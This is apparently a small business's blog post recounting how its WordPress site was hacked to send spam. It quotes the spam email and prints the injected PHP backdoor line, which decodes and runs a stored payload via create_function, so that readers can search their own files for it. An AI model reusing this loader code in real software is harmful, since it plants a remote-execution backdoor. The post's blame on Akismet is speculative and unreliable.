Is Your Website Being Attacked? Wanna Bet?


Skull and Crossbones 404 error

Oh, if only the notice were so romantic, it might ease the pain. Almost every site we know of is being probed and attacked daily. WHO KNEW? And of course, we found out the hard way. On Thursday March 25th, we found out our site had been hacked. The hacker forced open a path into our site’s permissions folder apparently through AKISMET, an allegedly vulnerable bit of default “protection” software that comes with every copy of WordPress.

We only found out we had been attacked when a few of our friends reported a flurry of spam of the silliest kind. Bogus “returned emails” from unknown recipients, that after all was said and done, were promoting an obvious Trojan horse hidden in a bogus “One Day Sale Event.”

Hi Hans,
Check out our one day sale event – today only, March 25th, we have dropped prices for <a href=’http://www.hast-du-toene.info/a060z/?kal2503141…> on everything in our store.
Take an additional 15% off with this coupon: make sure to enter it at checkout.
Best regards,
Franz

Yes, it was actually guffaw worthy. But a Hans&Franz, Saturday Night Live hack that didn’t even promise to “Pump You Up?” Outrageous.

Seriously. To our amazement, we discovered that a line of code had been added to our website header, our index page, every plug-in folder and our functions. It went something like this:

; $z=base64_decode(str_rot13($z[‘insecure’]));

Apparently, “Base64” is hacker manna. Even relatively inexperienced newcomers to the hacker field can use it to turn your website into a zombie that sends out ridiculous emails like the one above or worse. We discovered that both Joomla! and WordPress sites are getting hacked to become part of a “malware botnet.”

One of the first lines of defense is to choose a secure webhost. When we reported the hack to our web host, they responded, “due to the nature of web hosting and the sheer amount of emails sent through our servers,” there was nothing they could do. Even though the email return address was patently bogus. Clearly their claim that “Our 100% satisfaction guarantee leaves no doubt that we are the right host for you,” was somewhat less than accurate.

So we cleaned it up ourselves.

When we started to remove the code, our site went down. It’s a tricky business.  Luckily we had a backup copy – something we instituted when one of our Joomla! sites was attacked last year. We were able to immediately put our entire site back (without the malware code) and soon thereafter changed our hosting services to one with better security. If you choose to do this, I suggest a service with the ability to deep scan your site should you suspect something peculiar. In our research, these were two suggestions that we found in our research to secure WordPress site.

BE ADVISED:

Small and medium size businesses using Joomla! or WordPress are the most highly targeted. According to Inc. Magazine, “Smaller companies are attractive because they tend to have weaker online security. They’re also doing more business than ever online via cloud services that don’t use strong encryption technology.”  If you use WordPress, be wary of Akismet. Some advise keeping Akismet up to date for most efficient operation, but no one ever suggested leaving it dormant. Others have noted that if it’s left on a site and not employed, it can serve as a backdoor to hackers. We chose to delete it altogether, and are now using Wordfence and SiteLock to batten down our hatches.

Ask your webhost what their defenses are, and request regular security scans. If all else fails and anything seems odd with your site, search your code for this deadly line – salted virtually everywhere on your site:

$z=get_option(“_site_transient_browser_eb09454f88562d3c77395b4e23f9977b”); $z=base64_decode(str_rot13($z[‘insecure’])); if(strpos($z,”68133E87″)!==false){ $_z=create_function(“”,$z); @$_z(); }

If you see it in any file or folder, search for it in every file and folder.

After we secured our site, we installed Wordfence to alert us to any intruder attempts on our site and others that we manage. To our surprise, we discovered attempts occur every day, often more than once. For the past two weeks, we endured hundreds of attempts. And as we checked with other hosters, we found that we were not alone.

One thing is certain. Your site is under attack. Daily. And your hosting service already knows it. Or they should no longer be your hosting service. Ask them to scan your sites files and folders for malware or do it yourself. But by all means, get it done.

Share Button